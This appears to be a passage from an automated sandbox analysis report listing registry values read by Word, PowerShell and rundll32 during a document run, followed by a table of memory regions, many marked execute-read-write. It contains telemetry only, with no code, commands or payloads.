@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F6E6C
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F6E6C
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 326 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1C0000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
3B0000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
2A0000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
720000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
6D0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
6B0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
100000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
2A84000
|
heap private
|
page read and write
|
||
2820000
|
unkown
|
page readonly
|
||
B60000
|
unkown
|
page write copy
|
||
34F9000
|
unkown
|
page read and write
|
||
300000
|
heap private
|
page read and write
|
||
34E9000
|
unkown
|
page read and write
|
||
670000
|
heap default
|
page read and write
|
||
8B0000
|
unkown
|
page readonly
|
||
3E0000
|
heap default
|
page read and write
|
||
2BBE000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page read and write
|
||
24C0000
|
unkown
|
page readonly
|
||
2FE2000
|
unkown
|
page read and write
|
||
3163000
|
unkown
|
page read and write
|
||
1B48D000
|
unkown
|
page read and write
|
||
30BE000
|
unkown
|
page read and write
|
||
B37000
|
unkown
|
page readonly
|
||
282C000
|
unkown
|
page readonly
|
||
A50000
|
unkown
|
page readonly
|
||
350000
|
heap default
|
page read and write
|
||
3AE000
|
heap default
|
page read and write
|
||
29CF000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
650000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page read and write
|
||
DAD000
|
stack
|
page read and write
|
||
24B000
|
unkown
|
page read and write
|
||
5C0000
|
heap default
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
304000
|
heap private
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
30E6000
|
unkown
|
page read and write
|
||
260000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
2B84000
|
unkown
|
page read and write
|
||
2720000
|
unkown
